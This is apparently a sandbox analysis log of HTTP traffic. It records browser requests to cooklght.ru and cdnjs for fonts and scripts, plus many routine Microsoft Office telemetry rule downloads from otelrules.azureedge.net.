    Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.5.0/css/all.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://cooklght.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js HTTP/1.1Host: cooklght.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.5.0/webfonts/fa-solid-900.woff2 HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://cooklght.rusec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.5.0/webfonts/fa-brands-400.woff2 HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://cooklght.rusec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: cooklght.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cooklght.ru//Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
